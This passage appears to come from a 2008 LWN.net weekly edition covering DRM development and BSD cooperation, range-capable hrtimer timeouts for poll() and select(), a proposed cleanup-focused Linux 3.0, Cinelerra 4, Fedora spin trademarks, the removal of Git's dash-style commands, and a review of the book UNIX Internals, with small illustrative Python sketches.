     features which are not yet present in the mainline kernel.


The result of all this, it is hoped, will be a development process which is
more efficient, more tightly coupled to the upstream kernel, and more
accessible for developers outside of the current "DRM cabal."  These are
all worthy objectives, but there may also be a cost associated with these
changes resulting from the unique role the DRI/DRM project has in the free
software community.


There is clearly a great deal of code shared between Linux and other free
operating systems, and with the BSD variants in particular.  But that
sharing tends not to happen at the kernel level.  The Linux kernel is vastly
different from anything BSD-derived, so moving code between them is never a
straightforward task.  GPL-licensed code is not welcome in
BSD-licensed kernels, naturally, making it hard for code to move from Linux
to BSD even when it makes sense from a technical point of view.  When
code moves from BSD to Linux, it often brings a certain amount of acrimony 
with it.  So, while ideas can and do move freely, there is little sharing
of code between free kernels.


One significant exception is the DRM project, which is also used in most versions
of BSD.  One of the reasons behind the DRM project's current repository
organization is the facilitation of that cooperation; there are separate
directories for Linux code, BSD code, and code which is common to both.
Developers from all systems contribute to the code (though the BSD
developers are far outnumbered by their Linux counterparts), and they are
all able to use the code in their kernels.  When working in the common code
directory, developers know to be careful about not breaking other systems.
All told, it is a bit of welcome collaboration in an area where development
resources have tended to be in short supply - even if it benefits the BSD
side more than Linux.


Changing the organization of the DRM tree to be more directly based on
Linux seems unlikely to make life easier for the BSD developers.  Space for
BSD-specific code will remain available in the DRM repository, but turning
the "shared-code" directory into code in the Linux driver tree will make
its shared status less clear, and, thus, easier for Linux developers to
break on BSD.  Additionally, it seems clear that this code
may become more Linux-specific; Dave Airlie says:


	However I am sure that we will see more of a push towards using
	Linux constructs in dri drivers, things like idr, list.h, locking
	constructs are too much of a pain to reinvent for every driver.


Much of this functionality can be reproduced through compatibility layers
on the BSD side, but it must carry a bit of a second-class citizen feel.
Dave has, in fact, made that state of affairs clear:


	The thing is you can't expect equality, its just not possible,
	there are about 10-15 Linux developers, and 1 Free and 1 Open BSD
	developer working on DRM stuff at any one time, so you cannot
	expect the Linux developers to know what the BSD requirements are.


The fact that fewer people will be able to commit to the new repository -
in fact, it may be limited to Dave Airlie - also does not help.  So FreeBSD
developer Robert Noland, while calling this proposal "the most fair" of any
he has heard, is far from sure that he will
be able to work with it:


	I am having a really difficult time seeing what benefit I get from
	continuing to work in drm.git with this proposed model.  While all
	commits to master going through the mailing list, I don't
	anticipate that I have any veto power or even delay powers until I
	can at least prevent imports from breaking BSD.  Then once I do get
	it squared away, I'm still left having to send those to the ML and
	wait for approval to push the fixes.  I can just save myself that
	part of the hassle and work privately.  If I'm going to have to
	hand edit and merge every change, I don't see how it is really any
	harder to do that in my own repo, where I'm only subject to FreeBSD
	rules.


On the other hand, it's worth noting that OpenBSD developer Owain Ainsworth
already works in his own repository and seems
generally supportive of these changes.

Given the difference between the numbers of Linux-based
and BSD-based developers, it seems almost certain that a more
Linux-friendly process will win out.  There is one rumored change which
will not be happening, though: nobody is proposing to relicense the DRM
code to the GPL.  The DRM developers are only willing to support BSD to a
certain point, but they certainly are not looking to make life harder for
the BSD community.  So they will try to accommodate the BSD developers
while moving to a more Linux-centric development model; that is how things
are likely to go until such a time as the BSD community is able to bring
more developers to the party.

		High- (but not too high-) resolution timeouts


Linux provides a number of system calls that allow an application to wait
for file descriptors to become ready for I/O; they include
select(), pselect(), poll(), ppoll(),
and epoll_wait().  Each of these interfaces allows the
specification of a timeout putting an upper bound on how long the
application will be blocked.  In typical fashion, the form of that timeout
varies greatly.  poll() and epoll_wait() take an integer
number of milliseconds; select() takes a struct timeval
with microsecond resolution, and ppoll() and pselect()
take a struct timespec with nanosecond resolution.
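
To make the differences concrete, here is a small sketch that expresses one timeout in each of the three forms and then times a real poll() call from user space. The function names are invented for this example; Python's select module hides the C structures, so the timeval and timespec forms are shown as plain tuples.

```python
import select
import time

NSEC_PER_SEC = 1_000_000_000


def timeout_forms(timeout_ns):
    """Express one timeout (given in nanoseconds) in each interface's units."""
    sec, nsec = divmod(timeout_ns, NSEC_PER_SEC)
    return {
        # poll(), epoll_wait(): whole milliseconds (truncated here)
        "milliseconds": timeout_ns // 1_000_000,
        # select(): struct timeval as (seconds, microseconds)
        "timeval": (sec, nsec // 1_000),
        # pselect(), ppoll(): struct timespec as (seconds, nanoseconds)
        "timespec": (sec, nsec),
    }


def measure_poll(timeout_ms):
    """Return how long an empty poll() with the given timeout really blocks."""
    start = time.monotonic()
    select.poll().poll(timeout_ms)  # no descriptors registered: pure timeout
    return time.monotonic() - start


if __name__ == "__main__":
    print(timeout_forms(1_500_000_000))
    print(timeout_forms(10))  # only the timespec form can represent 10ns
    print(f"poll(20ms) blocked for {measure_poll(20) * 1000:.3f} ms")
```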

They are all the same, though, in that they convert this timeout value to
jiffies, with a maximum resolution between one and ten milliseconds.  A
programmer might program a pselect() call with a
10 nanosecond timeout, but the call may not return until
10 milliseconds later, even in the absence of contention for the CPU.
An error of six orders of magnitude seems like a bit much, especially given
that contemporary hardware can easily support much more accurate timing.
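
The size of that error is easy to work out. The sketch below is a simplified model, not the kernel's conversion code: it assumes a positive timeout is rounded up to a whole number of jiffies and ignores any extra jiffy the kernel may add.

```python
NSEC_PER_SEC = 1_000_000_000


def jiffies_timeout_ns(timeout_ns, hz):
    """Round a positive timeout up to whole jiffies; return the result in ns."""
    jiffy_ns = NSEC_PER_SEC // hz
    jiffies = max(1, -(-timeout_ns // jiffy_ns))  # integer ceiling division
    return jiffies * jiffy_ns


if __name__ == "__main__":
    for hz in (100, 250, 1000):
        effective = jiffies_timeout_ns(10, hz)
        print(f"HZ={hz}: 10ns becomes {effective}ns ({effective // 10}x longer)")
```

With HZ=100, a 10ns request becomes 10,000,000ns, which is the factor of one million mentioned above.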

Arjan van de Ven recently surfaced with a patch set aimed at addressing
this problem.  The core idea is simple: have the code implementing
poll() and select() use high-resolution timers instead of
converting the timeout period to low-resolution jiffies.  The
implementation relied on a new function to provide the timeouts:


Here, time is the timeout period, as interpreted by mode
(which is either HRTIMER_MODE_ABS or HRTIMER_MODE_REL).

High-resolution timeouts are a nice feature, but one can immediately
imagine a problem: higher-resolution timeouts are less likely to coincide
with other events which wake up the processor.  The result will be more
wakeups and greater power consumption.  As it happens, there are few
developers who are more aware of this fact than Arjan, who has done quite a
bit of work aimed at keeping processors asleep as much as possible.  His
solution to this problem was to only use high-resolution timeouts if the
timeout period is less than one second.  For longer timeout periods, the
old, jiffies-based mechanism was used as before.

Linus didn't like that solution, calling it
"ugly."  His preference, instead, was to have schedule_hrtimeout()
apply an appropriate amount of fuzz to all timeout values; the longer the
timeout, the less resolution would be supplied.  Alan Cox suggested that a better mechanism would be
for the caller to supply the required accuracy with the timeout value.  The
problem with that idea, as Linus pointed out, is that the current system
call interfaces provide no way for an application to supply the accuracy
value.  One could create more poll()-like system calls - as if
there weren't enough of them already - with an accuracy parameter, but that
looks like a lot of trouble to create a non-standard interface which few
programmers would bother to use.

A different solution came in the form of Arjan's range-capable timer patch set.
This patch extends hrtimers to accept two timeout values, called the "soft"
and "hard" timeouts.  The soft value - the shorter of the two - is the
first time at which the timeout can expire; the kernel will make its best
effort to ensure that it does not expire after the hard period has
elapsed.  In between the two, the kernel is free to expire the timer at any
convenient time.
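
One way to picture the soft/hard window is as a search for a wakeup that is going to happen anyway. The following is a toy model of the behavior described above, not the hrtimer code itself; pick_expiry() and its arguments are invented for illustration.

```python
def pick_expiry(soft, hard, other_wakeups):
    """Choose when a range timer fires, given already-scheduled wakeups.

    The timer may not fire before `soft` and should not fire after `hard`.
    If the processor will be awake anyway at some point in that window,
    piggyback on the earliest such point; otherwise fall back to `hard`.
    """
    if soft > hard:
        raise ValueError("soft expiry must not be later than hard expiry")
    candidates = [t for t in other_wakeups if soft <= t <= hard]
    return min(candidates) if candidates else hard


if __name__ == "__main__":
    # Times are in arbitrary units.
    print(pick_expiry(100, 150, [90, 120, 140]))  # shares the wakeup at 120
    print(pick_expiry(100, 150, [90, 200]))       # nothing to share; uses 150
```

The wider the window, the better the odds that the timer can share a wakeup, which is where the power savings come from.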

It's a useful feature, but it comes at the cost of some significant API
changes.  To begin with, the expires field of struct
hrtimer goes away.  Rather than manipulate expires directly,
kernel code must now use one of the new accessor functions:


Once that's done, the range capability is added to hrtimers.  By default,
the soft and hard expiration times are the same; code which wishes to set
them independently can use the new functions:


In the new "set" functions, the specified time is the soft
timeout, while time+delta provides the hard timeout value.  There
is also another form of schedule_timeout():


With this infrastructure in place, poll() and friends can be given
approximate timeouts; the only remaining question is just how wide the
range of times should be.  In Arjan's patch, that range comes from two
different sources.  The first is a new field in the task structure called
timer_slack_ns; as one might expect, it specifies the maximum
expected timer accuracy in nanoseconds.  This value can be adjusted via the
prctl() system call.  The default value is set to
50 microseconds - approximate to a certain degree, but still far more
accurate than the timeouts in current kernels.
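
As a sketch of what adjusting this value from user space might look like, the example below calls prctl() through ctypes. The article does not name the prctl() options; the PR_SET_TIMERSLACK and PR_GET_TIMERSLACK numbers used here are those found in mainline kernels' linux/prctl.h and should be treated as an assumption relative to the patch under discussion.

```python
import ctypes

# Option numbers from <linux/prctl.h> in mainline kernels (an assumption
# here; the article does not name them).
PR_SET_TIMERSLACK = 29
PR_GET_TIMERSLACK = 30

_libc = ctypes.CDLL(None, use_errno=True)


def _prctl(option, arg2=0):
    """Call prctl(option, arg2, 0, 0, 0) with unsigned long arguments."""
    zero = ctypes.c_ulong(0)
    return _libc.prctl(option, ctypes.c_ulong(arg2), zero, zero, zero)


def set_timer_slack_ns(slack_ns):
    """Ask the kernel to use `slack_ns` as this thread's timer slack."""
    return _prctl(PR_SET_TIMERSLACK, slack_ns) == 0


def get_timer_slack_ns():
    """Return the current timer slack in nanoseconds, or None on failure."""
    value = _prctl(PR_GET_TIMERSLACK)
    return value if value >= 0 else None


if __name__ == "__main__":
    print("current slack (ns):", get_timer_slack_ns())
    if set_timer_slack_ns(100_000):
        print("new slack (ns):", get_timer_slack_ns())
```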

Beyond that, though, there is a heuristic function which provides an
accuracy value depending on the requested timeout period.  In the case of
especially long timeouts - more than ten seconds - the accuracy is set to
100ms; as the timeouts get shorter, the amount of acceptable error drops,
down to a minimum of 10ns for very brief timeouts.  Normally,
poll() and company will use the value returned by the heuristic,
but with the exception that the accuracy will never exceed the value found
in timer_slack_ns.
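
A rough sketch of such a heuristic follows. Only the two endpoints (100ms for timeouts over ten seconds, 10ns at the bottom) come from the description above; the 1% scaling in between is purely an assumption made for illustration, and the sketch reads the timer_slack_ns rule as meaning that a timeout is never made more precise than that value.

```python
NSEC_PER_MSEC = 1_000_000
NSEC_PER_SEC = 1_000_000_000


def estimate_slack_ns(timeout_ns, timer_slack_ns=50_000):
    """Return the acceptable timer error, in ns, for a given timeout."""
    if timeout_ns > 10 * NSEC_PER_SEC:
        heuristic = 100 * NSEC_PER_MSEC
    else:
        # ASSUMPTION: allow an error of 1% of the timeout, but no less
        # than 10ns. The real patch's intermediate steps are not given.
        heuristic = max(10, timeout_ns // 100)
    # Never be more precise than the per-task slack setting.
    return max(heuristic, timer_slack_ns)


if __name__ == "__main__":
    for timeout in (1_000, NSEC_PER_SEC, 20 * NSEC_PER_SEC):
        print(f"{timeout}ns timeout: {estimate_slack_ns(timeout)}ns of slack")
```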

The end result is the provision of more accurate timeouts on the polling
functions while, simultaneously, preserving the ability to combine timeouts
with other system events.

		Linux 3.0?


The Linux kernel
summit is happening this month, so various discussion topics are being
tossed around on the Ksummit-2008-discuss
mailing list.  Alan Cox suggested
a Linux release that would "throw out" some accumulated, unmaintained cruft
as a topic to be discussed.
Cox would like to see
that release be well publicized, with a new release number, so that the
intention of the release would be clear.  While there will be disagreements
about which drivers and subsystems can be removed, participants in
the thread seem favorably disposed to the idea—at
least enough that it should be discussed. 


There is already a process in place for deprecating and eventually removing
parts of the kernel that need it, but it is somewhat haphazardly used.  Cox
proposes: 

At some point soon we add all the old legacy ISA drivers (barring the odd
ones that turn up in embedded chipsets on LPC bus) into the
feature-removal list and declare an 'ISA death' flag day which we brand
2.8 or 3.0 or something so everyone knows that we are having a single
clean 'throw out' of old junk.

It would also be a chance to throw out a whole pile of other "legacy"
things like ipt_tos, bzImage symlinks, ancient SCTP options, ancient
lmsensor support, V4L1 only driver stuff etc.


Cox's list sparked immediate protest about some of the items on it, but the
general idea was well received.  There are certainly sizable portions of
the kernel,
especially for older hardware, that are unmaintained and probably completely
broken.  No one seems to have any interest in carrying that stuff forward,
but, without a concerted effort to identify and remove crufty code, it is
likely to remain.  Cox has suggested one way to make that happen;
discussion at the kernel summit might refine his idea or come up with
something entirely different.


Part of the reason that unmaintained code tends to hang around is that the
kernel hackers have gotten much better at fixing all affected code when
they make an API change.  While that is definitely a change for the better,
it does 
have the effect of sometimes hiding code that might be ready to be removed.  In
earlier times, dead code would have become unbuildable after an API change
or two, leading to either a
maintainer stepping up or the code being removed.


The need to make a "major" kernel release, with a corresponding change to
the major or minor release number, is the biggest question that the kernel
hackers seem to have.  Greg Kroah-Hartman asks: 

Can't we do all of the above today in our current model?  Or is it just
a marketing thing to bump to 3.0?  If so, should we just pick a release
and say, "here, 2.6.31 is the last 2.6 kernel and for the next 3 months
we are just going to rip things out and create 3.0"?


There is an element of "marketing" to Cox's proposal.  Publicizing a major
release, along with the intention to get rid of "legacy" code, will allow
interested parties to step up to maintain pieces that they do not want to
see removed.  As Cox puts
it:

I thought it might be useful to actually draw some definite lines so we
can actually get around to throwing stuff out rather than letting it rot
forever and also if its well telegraphed both give people a chance to fix
where the line goes and - yes - as a marketing thing as much as anything
else to define the line in a way that non-techies, press etc get.

Plus it appeals to my sense of the open source way of doing things
differently - a major release about getting rid of old junk not about
adding more new wackiness people don't need 8)


Arjan van de Ven thinks
that gathering the list of things to be removed is a good exercise:

I like the idea of at least discussing this, and for a bunch of people
making a long list of what would go.
Based on that whole list it becomes a value discussion/decision; is there
enough of this to make it worth doing.


Once the list
has been gathered and discussed, van de Ven notes, 
it may well be that it can be done under
the current development model, without a major release. "But let's at
least do the exercise. It's worth validating the model we have 
once in a while ;)"


This may not be the only discussion of kernel version numbers that takes
place at the summit.  Back in July, Linus Torvalds mentioned a bikeshed painting project that he
planned to bring up.  It seems that Torvalds is less than completely happy
with how large the minor release number of the kernel is; he would like to
see numbers that have more meaning, possibly date-based:

The only thing I do know is that I agree that "big meaningless numbers" 
are bad. "26" is already pretty big. As you point out, the 2.4.x series 
has much bigger numbers yet.

And yes, something like "2008" is obviously numerically bigger, but has a 
direct meaning and as such is possibly better than something arbitrary and 
non-descriptive like "26".


Version numbers are not important, per se, but having a consistent,
well-understood numbering scheme certainly is.  The current system has been
in place for four years or so without much need to modify it.  That may
still be the case, but with ideas about altering it coming from multiple
directions, there could be changes afoot as well.   


For
the kernel hackers themselves, there is little benefit—except,
perhaps, preventing the annoyance of ever-increasing numbers—but version
numbering does provide a mechanism to communicate with the "outside
world".  Users have come to expect the occasional major release, with some
sizable and visible chunk of changes, but the current incremental kernel
releases do not provide that numerically; instead, big changes come
with nearly every kernel release.  There may be value in raising the
visibility of one particular release, either as a means to clean up the
kernel or to move to a different versioning scheme—perhaps both at once.


		Cinelerra 4 arrives


Cinelerra
is a compositing video and audio editor that is being developed by
Heroine Virtual LTD's
Adam Williams when he isn't playing with
autonomous miniature helicopters.
Cinelerra is derived from the now-discontinued Broadcast 2000 project.
The project is described as follows:


Unleash the 50,000 watt flamethrower of content creation in your UNIX box. Cinelerra does primarily 3 things: capturing, compositing, and editing audio and video with sample level accuracy. It's a movie studio in a box.
If you want the same kind of editing suite that the big boys use, on an efficient UNIX operating system, it's time for Cinelerra.
Cinelerra is not community approved and there is no support from the developer. Donations to community websites do not fund Cinelerra development.


The
Wikipedia entry
for Cinelerra summarizes the project's window set:


The user is presented with four screens:
1. The timeline, which gives the user a time-based view of all video and audio tracks in the project, as well as keyframe data for e.g. camera movement, effects, or opacity;
2. the viewer, which gives the user a method of "scrubbing" through footage;
3. the resource window, which presents the user with a view of all audio and video resources in the project, as well as available audio and video effects and transitions; and
4. the compositor, which presents the user with a view of the final project as it would look when rendered. The compositor is interactive in that it allows the user to adjust the positions of video objects; it also updates in response to user input.


The main
Cinelerra
page lists the software's many features.
Version 4.0 of Cinelerra was released on August 8, 2008; the
change log details the most recent feature additions.
Older project history is available in the
news document.
One big change for this release is the availability of pre-compiled
binaries for 32- and 64-bit versions of Ubuntu 8.04.
This can be a real time saver due to the complexity of the
build process, and should make Cinelerra accessible to a wider variety of users.


Cinelerra works best with specific hardware configurations.
An NVidia graphics card is recommended:
"Cinelerra supports OpenGL shaders on NVidia graphics cards. The video crunching power that was once exclusively the domain of SGI minicomputers is now yours. NVidia users can run many effects in realtime instead of rendering them. OpenGL also opens up new video resolutions, up to 4096x4096 on high end cards."
And a 64-bit Linux platform is a good idea:
"Since it's Linux, it's been 64 bit compliant for years. In fact, Cinelerra is only recommended for 64 bit mode. The reason is the large amount of virtual memory required for page flipping and floating point images often exceeds the limit of 32 bits. "


Your author has used Cinelerra in the past for audio editing; see
this article
for details.
Cinelerra has one capability that is hard to find in other Linux audio
editing software: the ability to split (render) a huge .wav file
into a group of smaller .wav files across multiple position labels,
all in one operation.
This feature is useful for processing long audio recordings such
as digitized vinyl album sides and copies of digital audio (DAT) tapes.
This was the first operation that Cinelerra 4 was tried on.
After some initial crashing difficulties, a startup warning message about
an insufficient shmmax value was heeded.
Changing shmmax is simply a matter of running
echo 0x7fffffff > /proc/sys/kernel/shmmax as root before
starting Cinelerra.  After doing that, your author was unable to make the
software crash while processing audio.


Lacking a high resolution video camera, your author was able to use his
Nikon Coolpix S10 VR digital camera to produce low
resolution .mov format movies with mono audio tracks.
Cinelerra was able to display videos from this camera,
specifically movies of thunderstorms.
Individual frames containing lightning strikes were located
by single-stepping through interesting sections of the movie; the
still frames were then grabbed from the screen using an
external application (xv).  The single-step capability allowed the
life cycle of a lightning bolt to be observed.
This is a much less expensive way to procure photographs of lightning
than using lots of 35mm film and
specialized hardware.


Attempts to do actual video editing were somewhat less successful
than simple playback.  Creating a fade-in at the beginning of a
short video clip worked, but several attempts to add a second
video track crashed Cinelerra, as did saving a modified track.
This may be related to the camera's data, which has confused other
video players (mplayer) in the past, or to the lack of a
professional-quality video device.
The computer was running a (not recommended) 32-bit
version of Ubuntu and an older Radeon video card.  As with high-end
audio processing, it is probably best to put together a system
with the specific hardware and operating system that is recommended
for the application.


While Cinelerra is more of a professional video tool than
a generic desktop application, it nonetheless has some very
useful capabilities outside of its primary application space.
It is the most full-featured video
playback application that your author has experimented with,
and it functions nicely as an audio processing tool.


		Spinning Fedora


There was a discussion recently on the fedora-advisory-board list about
when a derivative is an official spin vs. one that is Fedora based.  It
started out innocently enough with a request
for trademark approval for an Appliance Operating Spin.

Right away Bill Nottingham noted that
SELinux is disabled in this spin and wondered why.  The answer was simple
enough: there are some current issues with the building tool and SELinux.

That was a simple enough start to what turned into a somewhat lengthy
discussion of what makes Fedora Fedora.  This is not the first time that
the Fedora Advisory Board has tackled this issue, but it seems that not all
board members are in complete agreement on the difference between an
official Fedora spin and something which is merely Fedora based.

Jesse Keating recalled a conversation that
took place during the merge of core and extras on whether or not there
should be a "Fedora Standard Base".  

That is, a basic set of
things you must have in your "spin" in order to call it Fedora.  These
include things like rpm, yum, and SELinux (at least in my opinion), but
we never really coded this up nor hashed out what should be in the FSB,
or if FSB was even a good name for the concept.


A draft 
version of trademark guidelines is available, and awaiting comments
and approval by the Fedora Board.  The guidelines in this document do not
make any packages mandatory for trademark approval.  They do state that
official spins will include only those packages that are available in the
official Fedora repository.  Pretty much all spins, with the notable
exception of the Everything Spin, will contain a subset of all the packages
in the repository and are left to choose which packages they need or don't
need.

Axel Thimm posted that official spins
should have high standards and should improve the brand name.

Currently I cannot imagine Fedora w/o rpm or yum, but I can imagine it
w/o selinux if I think about very small footprints, nano-Fedoras and
all the recent suggestion. I wouldn't mind my phone to advertise that
it runs on Fedora, even if selinux was turned off (but the high
standard of security is ensured in another way).

Since we can't envision what nice spins/derivatives people will come up
with (I first heard of the appliance spin), we should not statically
enforce any requirements, but instead have the board be the checking
instance like it is now.


Of course, it's not just about the trademarks.  The discussion also brought
up the kickstart pool and whether unofficial spins should be included in
the pool, or even whether all official spins should be included.  So there
could be trademarked Fedora spins that aren't allowed in the kickstart
pool, perhaps because of their choice of packages.  Or there could be
"Xora", a Fedora based distribution, that would be in the kickstart pool
and available in the Fedora Hosted service.

Jeff Spaleta looked at how the kickstart
pool might be structured.

Under the current workflow, there are essentially 3 different technical
levels.
1) Spin SIG best practices to get into kickstart pool
2) Technical issues which are associated with trademark approval
3) Technical requirements for RelEng for 'release' of a spin.

These can be layered technical hurdles, which  the kickstart pool
could be structured to mimic.


The bottom line, in this instance, seems to be that AOS (Appliance
Operating Spin) will likely get trademark approval, since it only contains
official Fedora packages.  However, unless they get SELinux running on it,
either with permissive mode or with a custom policy, it won't get into the
kickstart pool.  Or perhaps it will be relegated to a second-class pool.

It may seem odd that an appliance needs SELinux, but as Jeroen van Meeuwen
says:  "On the other hand, of course
we do have an agenda to push and that agenda includes SELinux as being one
of the core features of the entire Fedora line of products (including the
few enterprise linux spin-offs).  It's one of the main features and we
would rather see appliances built upon an AOS that has SELinux enforcing by
default while it can still be disabled."

		Feature removal sparks Git flamewar


Removing features from a tool is never easy.  Once there is enough of a
user base to complain about annoyances, there is also a vocal group that
uses and likes those same annoyances.  The recent removal of the
git-foo 
style commands from Git is just such a case, but many of those
using those commands did not find out
about the removal until after the change was made, which only served to
increase their outrage.


Until version 1.6.0, Git always had two ways to invoke the same
functionality: git foo and git-foo.  This was done by
installing many—usually more than 100—different entries into
/usr/bin for all of the different git subcommands.  Some were
concerned that Git was polluting that directory, but the bigger issue was
the effect on new users.  Partially because of shell autocompletion, a new
user might be overwhelmed by the number of different Git commands
available; even regular users might find it difficult to find the command
they are looking for if they have to sort through 100 or more.


Many of the Git subcommands that exist are not necessarily regularly used.
There are quite a number of "plumbing" commands that rarely, if ever,
should be invoked by users. Those are best hidden from view, which can be
done by moving them out of /usr/bin.  This has been done for the
1.6.0 release, but Junio Hamano opened up a can of worms when he posted a
request for discussion about taking the
next step to the Git mailing list.


In the 1.6.0 release, the only things exposed in /usr/bin are the 
git binary itself along with a few other utilities; the rest have been
moved to /usr/libexec/git-core.  The hard links for each of the
git-foo commands have been maintained in the new location, which
allows folks that
still want the old behavior to get it by adding:

    PATH=$PATH:$(git --exec-path)

to .bashrc (or some other startup file, depending on the shell).
This would allow users—especially scripts—to continue using the
dash versions of commands. 


Unfortunately, for many users, the first they heard about this change was when
things stopped working after they installed 1.6.0.  The Git team admittedly
did not get the word out very well; by trying to be nice, they missed an
opportunity to make users notice the change.  As Hamano puts it:

But that niceness backfired.  Many people seem to argue now that we should
have annoyed people by throwing loud deprecation notices to stderr when
they typed "git-foo", and we should have risked breaking their scripts iff
they relied on not seeing anything extra on the stderr.


Hamano got caught in the middle to some extent as he wasn't particularly in
favor of the original change, but at the time it was decided, there were
few advocates for keeping 100+ commands in /usr/bin.  There were
several complaints about having that many commands, but chief amongst them
was confusion for new users.  By removing them from /usr/bin and
providing an autocompletion script for bash that completes only a subset of
the git 
subcommands, users will have fewer options to scan through—and to be
scared of.


The original plan called for moving the dash-style commands out, which has
been done, but also eventually removing the links for any of the
git-foo commands that are implemented in the core git
binary.  Over time, much of the functionality that was handled by external
commands has migrated into the main git program.
It is the eventual removal of the links that Hamano is asking about in his
message, but 
much of the response was flames about the step already taken; some
could not see any advantage to moving the git-foo commands out of
/usr/bin. 


David Woodhouse is one of those who wants
things to remain the same:

 Just don't do it. Leave the git-foo commands as they were. They
      weren't actually hurting anyone, and you don't actually _gain_
      anything by removing them. For those occasional nutters who
      _really_ care about the size of /usr/bin, give them the _option_
      of a 'make install' without installing the aliases.


Several others agreed, but that particular horse had already left the
barn.  Throughout the thread, Linus Torvalds was increasingly strident about the
$PATH-based workaround, which effectively ends the discussion that
Hamano was trying to have.  For that workaround to continue working, the links must be
installed in /usr/libexec/git-core.  Though it strays from the
original intent, it is a reasonable compromise, one that will serve
git-traditionalists as well as new users and others who no longer want the
git-foo syntax.


Two things have helped keep the controversy alive: some documentation,
test, and example scripts still refer to dash-style commands, but worse
than that, one must do man git-foo to get the man page for that
subcommand.  It is a convention within the Git community to use the
dash style when referring to commands in text, which explains some of the
usage.  Because man requires a single argument, the dash style is
used there as well, though git help foo is a reasonable
alternative.  For users who started relatively early with Git, and are aware of
the dash style commands, these examples further muddy the water.


It is a difficult problem.  Projects must have room to change, but once
users become used to a particular way of doing things, they will resist
changing—sometimes quite loudly.  As Petr "Pasky" Baudis points out, though, Git 
is still evolving:

You can't ask us to stop making any incompatible changes - Git is still
too young for that and it's UI got evolved, not designed. But we do
document the changes we do, even though we might do a better job
*spreading* the word.


The Git developers still see it as a young tool that may still undergo some
fairly substantial modifications, while the hardcore users see it as a
fixed tool that they use daily—or more frequently—to get work
done.  The tension between those two views is what leads to flamewars like
we have seen here.  Certainly the Git folks could have done a much better
job in getting the word out—Hamano was looking for suggestions on how to
do that better in his original post—but users are going to have to be
flexible as well.


		The Kernel Hacker's Bookshelf: UNIX Internals


Back in 2001, I landed my (then) dream job as a full-time Linux kernel
developer and distribution maintainer for a small embedded systems company.
I was thrilled - and horrified.  I'd only been working as a programmer
for a couple of years and I was sure it was only a matter of time
before my new employer figured out they'd hired an idiot.  The only
solution was to learn more about operating systems, and quickly.  So I
pulled out my favorite operating systems textbook and read and re-read
it obsessively over the course of the next year.  It worked well
enough that my company tried very hard to convince me not to quit when
I got bored with my "dream job" and left to work at Sun.


That operating systems textbook was
UNIX
Internals by Uresh Vahalia.  UNIX Internals is a careful, detailed
examination of multiple UNIX implementations as they evolved over
time, from the perspective of both the academic theorist and the
practical kernel developer.  What makes this book particularly
valuable to the practicing operating systems developer is that the
review of each operating systems concept - say, processes and threads
- is accompanied by descriptions of specific implementations and their
histories - say, threading in Solaris, Mach, and Digital UNIX.  Each
implementation is then compared on a number of practical levels,
including performance, effect on programming interfaces, portability,
and long-term maintenance burden - factors that Linux developers care
passionately about, but are seldom considered in the academic
operating systems literature.


UNIX Internals was published in 1996.  A valid question is whether a
book on the implementation details of UNIX operating systems published
so long ago is still useful today.  For example, Linux is only
mentioned briefly in the introduction, and many of the UNIX variants
described are now defunct.  It is true that UNIX Internals holds
relatively little value for the developer actively staying up to date
with the latest research and development in a particular area.
However, my personal experience has been that many of the problems
facing today's Linux developers are described in this book - and so
are many of the proposed solutions, complete with the unsolved
implementation problems.  More importantly, the analysis is often
detailed enough that it describes exactly the changes needed to
improve the technique, if only anyone took the time to implement them.


In the rest of this review, we'll cover two chapters of UNIX Internals
in detail, "Kernel Memory Allocation" and "File System
Implementations."  The chapter on kernel memory allocation is an
example of the historical, cross-platform review and analysis that
sets this book apart, covering eight popular allocators from several
different flavors of UNIX.  The chapter on file system implementations
shows how lessons learned from the oldest and most basic file system
implementations can be useful when solving the latest and hottest file
system design problems.

Kernel Memory Allocation

The kernel memory allocator (KMA) is one of the most
performance-critical kernel subsystems.  A poor KMA implementation
will hurt performance in every code path that needs to allocate or free
memory.  Worse, it will fragment and waste precious kernel memory -
memory that can't be easily freed or paged out - and pollute hardware
caches with instructions and data used for allocation management.
Historically, a KMA was considered pretty good if it only wasted 50%
of the total memory allocated by the kernel.


Vahalia begins with a short conceptual description of kernel memory
allocation and then immediately dives into practical implementation,
starting with page-level allocation in BSD.  Next, he describes memory
allocation in the very earliest UNIX systems: a collection of
fixed-size tables for structures like inodes and process table
entries, occasional "borrowing" of blocks from the buffer cache, and a
few subsystem-specific ad hoc allocators.  This primitive approach
required a great deal of tuning, wasted a lot of memory, and made the
system fragile.


What constitutes a good KMA?  After a quick review of the functional
requirements, Vahalia lays out the criteria he'll use to judge the
allocators: low waste (fragmentation), good performance, simple
interface appropriate for many different users, good alignment,
efficient under changing workloads, reassignment of memory allocated
for one buffer size to another, and integration with the paging
system.  He also takes into consideration more subtle points, such as
the cache and TLB footprint of the KMA's code, along with cache and
lock contention in multi-processor systems.


The first KMA reviewed is the resource map allocator, an extremely
simple allocator using a list of <base, size> pairs
describing each free segment of memory, sorted by base address.  The
charms of the resource map allocator include simplicity and allocation
of exactly the size requested; the vices include high fragmentation
and poor performance under nearly every workload.  Even this
allocation algorithm is useful under the right circumstances; Vahalia
describes several subsystems that still use it (System V semaphore
allocation and management of free space in directory blocks on some
systems) and some minor tweaks that improve the algorithm.  One tweak
to the resource map allocator keeps the description of each free
region in the first few bytes of the region, a technique later used in
the state-of-the-art SLUB allocator in the Linux kernel.  This is an
example of how even the oldest and clunkiest algorithms can influence the
design of the latest and greatest.
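
As a rough illustration of the idea (not code from the book), a resource
map can be sketched as a first-fit search over a list of (base, size) pairs
kept sorted by base address, with adjacent free segments merged on release.
The class and method names here are hypothetical.

```python
class ResourceMap:
    """First-fit allocator over (base, size) free segments sorted by base."""

    def __init__(self, base, size):
        self.free = [(base, size)]

    def alloc(self, size):
        # Take the first free segment that is large enough.
        for i, (base, seg_size) in enumerate(self.free):
            if seg_size >= size:
                if seg_size == size:
                    del self.free[i]
                else:
                    # Shrink the segment from the front: exact-size allocation.
                    self.free[i] = (base + size, seg_size - size)
                return base
        return None  # no single segment is big enough

    def release(self, base, size):
        # Insert in base order, then coalesce with the neighbours.
        i = 0
        while i < len(self.free) and self.free[i][0] < base:
            i += 1
        self.free.insert(i, (base, size))
        if i + 1 < len(self.free) and base + size == self.free[i + 1][0]:
            self.free[i] = (base, size + self.free[i + 1][1])
            del self.free[i + 1]
        if i > 0:
            pbase, psize = self.free[i - 1]
            cbase, csize = self.free[i]
            if pbase + psize == cbase:
                self.free[i - 1] = (pbase, psize + csize)
                del self.free[i]
```

Allocating 100, 200, and 300 units from a 1024-unit map and then releasing
only the middle buffer leaves 624 units free in two pieces, so a 500-unit
request fails: the fragmentation problem in miniature.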


